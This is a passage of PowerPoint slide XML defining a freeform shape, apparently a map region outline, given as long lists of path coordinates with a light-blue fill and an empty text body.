                      <a:pt x="144" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="207"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="264"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="265"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="264"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="259"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="259"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="235"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="235"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="193"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="192"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="9"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36161" name="Freeform 294"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1485" y="2745"/>
                <a:ext cx="188" cy="265"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 114 w 188"/>
                  <a:gd name="T1" fmla="*/ 10 h 265"/>
                  <a:gd name="T2" fmla="*/ 110 w 188"/>
                  <a:gd name="T3" fmla="*/ 20 h 265"/>
                  <a:gd name="T4" fmla="*/ 97 w 188"/>
                  <a:gd name="T5" fmla="*/ 38 h 265"/>
                  <a:gd name="T6" fmla="*/ 95 w 188"/>
                  <a:gd name="T7" fmla="*/ 52 h 265"/>
                  <a:gd name="T8" fmla="*/ 107 w 188"/>
                  <a:gd name="T9" fmla="*/ 69 h 265"/>
                  <a:gd name="T10" fmla="*/ 112 w 188"/>
                  <a:gd name="T11" fmla="*/ 86 h 265"/>
                  <a:gd name="T12" fmla="*/ 135 w 188"/>
                  <a:gd name="T13" fmla="*/ 87 h 265"/>
                  <a:gd name="T14" fmla="*/ 150 w 188"/>
                  <a:gd name="T15" fmla="*/ 99 h 265"/>
                  <a:gd name="T16" fmla="*/ 165 w 188"/>
                  <a:gd name="T17" fmla="*/ 101 h 265"/>
                  <a:gd name="T18" fmla="*/ 180 w 188"/>
                  <a:gd name="T19" fmla="*/ 111 h 265"/>
                  <a:gd name="T20" fmla="*/ 177 w 188"/>
                  <a:gd name="T21" fmla="*/ 122 h 265"/>
                  <a:gd name="T22" fmla="*/ 183 w 188"/>
                  <a:gd name="T23" fmla="*/ 139 h 265"/>
                  <a:gd name="T24" fmla="*/ 179 w 188"/>
                  <a:gd name="T25" fmla="*/ 154 h 265"/>
                  <a:gd name="T26" fmla="*/ 178 w 188"/>
                  <a:gd name="T27" fmla="*/ 172 h 265"/>
                  <a:gd name="T28" fmla="*/ 148 w 188"/>
                  <a:gd name="T29" fmla="*/ 172 h 265"/>
                  <a:gd name="T30" fmla="*/ 155 w 188"/>
                  <a:gd name="T31" fmla="*/ 184 h 265"/>
                  <a:gd name="T32" fmla="*/ 156 w 188"/>
                  <a:gd name="T33" fmla="*/ 190 h 265"/>
                  <a:gd name="T34" fmla="*/ 144 w 188"/>
                  <a:gd name="T35" fmla="*/ 191 h 265"/>
                  <a:gd name="T36" fmla="*/ 150 w 188"/>
                  <a:gd name="T37" fmla="*/ 207 h 265"/>
                  <a:gd name="T38" fmla="*/ 154 w 188"/>
                  <a:gd name="T39" fmla="*/ 219 h 265"/>
                  <a:gd name="T40" fmla="*/ 145 w 188"/>
                  <a:gd name="T41" fmla="*/ 265 h 265"/>
                  <a:gd name="T42" fmla="*/ 137 w 188"/>
                  <a:gd name="T43" fmla="*/ 258 h 265"/>
                  <a:gd name="T44" fmla="*/ 142 w 188"/>
                  <a:gd name="T45" fmla="*/ 243 h 265"/>
                  <a:gd name="T46" fmla="*/ 121 w 188"/>
                  <a:gd name="T47" fmla="*/ 237 h 265"/>
                  <a:gd name="T48" fmla="*/ 108 w 188"/>
                  <a:gd name="T49" fmla="*/ 239 h 265"/>
                  <a:gd name="T50" fmla="*/ 96 w 188"/>
                  <a:gd name="T51" fmla="*/ 233 h 265"/>
                  <a:gd name="T52" fmla="*/ 88 w 188"/>
                  <a:gd name="T53" fmla="*/ 227 h 265"/>
                  <a:gd name="T54" fmla="*/ 74 w 188"/>
                  <a:gd name="T55" fmla="*/ 210 h 265"/>
                  <a:gd name="T56" fmla="*/ 56 w 188"/>
                  <a:gd name="T57" fmla="*/ 201 h 265"/>
                  <a:gd name="T58" fmla="*/ 47 w 188"/>
                  <a:gd name="T59" fmla="*/ 194 h 265"/>
                  <a:gd name="T60" fmla="*/ 28 w 188"/>
                  <a:gd name="T61" fmla="*/ 194 h 265"/>
                  <a:gd name="T62" fmla="*/ 12 w 188"/>
                  <a:gd name="T63" fmla="*/ 182 h 265"/>
                  <a:gd name="T64" fmla="*/ 0 w 188"/>
                  <a:gd name="T65" fmla="*/ 172 h 265"/>
                  <a:gd name="T66" fmla="*/ 9 w 188"/>
                  <a:gd name="T67" fmla="*/ 168 h 265"/>
                  <a:gd name="T68" fmla="*/ 15 w 188"/>
                  <a:gd name="T69" fmla="*/ 159 h 265"/>
                  <a:gd name="T70" fmla="*/ 26 w 188"/>
                  <a:gd name="T71" fmla="*/ 146 h 265"/>
                  <a:gd name="T72" fmla="*/ 25 w 188"/>
                  <a:gd name="T73" fmla="*/ 132 h 265"/>
                  <a:gd name="T74" fmla="*/ 24 w 188"/>
                  <a:gd name="T75" fmla="*/ 111 h 265"/>
                  <a:gd name="T76" fmla="*/ 29 w 188"/>
                  <a:gd name="T77" fmla="*/ 105 h 265"/>
                  <a:gd name="T78" fmla="*/ 27 w 188"/>
                  <a:gd name="T79" fmla="*/ 97 h 265"/>
                  <a:gd name="T80" fmla="*/ 18 w 188"/>
                  <a:gd name="T81" fmla="*/ 85 h 265"/>
                  <a:gd name="T82" fmla="*/ 22 w 188"/>
                  <a:gd name="T83" fmla="*/ 76 h 265"/>
                  <a:gd name="T84" fmla="*/ 30 w 188"/>
                  <a:gd name="T85" fmla="*/ 72 h 265"/>
                  <a:gd name="T86" fmla="*/ 25 w 188"/>
                  <a:gd name="T87" fmla="*/ 61 h 265"/>
                  <a:gd name="T88" fmla="*/ 34 w 188"/>
                  <a:gd name="T89" fmla="*/ 73 h 265"/>
                  <a:gd name="T90" fmla="*/ 35 w 188"/>
                  <a:gd name="T91" fmla="*/ 63 h 265"/>
                  <a:gd name="T92" fmla="*/ 46 w 188"/>
                  <a:gd name="T93" fmla="*/ 50 h 265"/>
                  <a:gd name="T94" fmla="*/ 54 w 188"/>
                  <a:gd name="T95" fmla="*/ 43 h 265"/>
                  <a:gd name="T96" fmla="*/ 60 w 188"/>
                  <a:gd name="T97" fmla="*/ 26 h 265"/>
                  <a:gd name="T98" fmla="*/ 71 w 188"/>
                  <a:gd name="T99" fmla="*/ 24 h 265"/>
                  <a:gd name="T100" fmla="*/ 76 w 188"/>
                  <a:gd name="T101" fmla="*/ 17 h 265"/>
                  <a:gd name="T102" fmla="*/ 90 w 188"/>
                  <a:gd name="T103" fmla="*/ 18 h 265"/>
                  <a:gd name="T104" fmla="*/ 106 w 188"/>
                  <a:gd name="T105" fmla="*/ 10 h 265"/>
                  <a:gd name="T106" fmla="*/ 117 w 188"/>
                  <a:gd name="T107" fmla="*/ 0 h 265"/>
                  <a:gd name="T108" fmla="*/ 127 w 188"/>
                  <a:gd name="T109" fmla="*/ 6 h 265"/>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88"/>
                  <a:gd name="T166" fmla="*/ 0 h 265"/>
                  <a:gd name="T167" fmla="*/ 188 w 188"/>
                  <a:gd name="T168" fmla="*/ 265 h 265"/>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88" h="265">
                    <a:moveTo>
                      <a:pt x="125" y="9"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="124" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="207"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="264"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="265"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="264"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="259"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="259"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="235"/>
                    </a:lnTo>
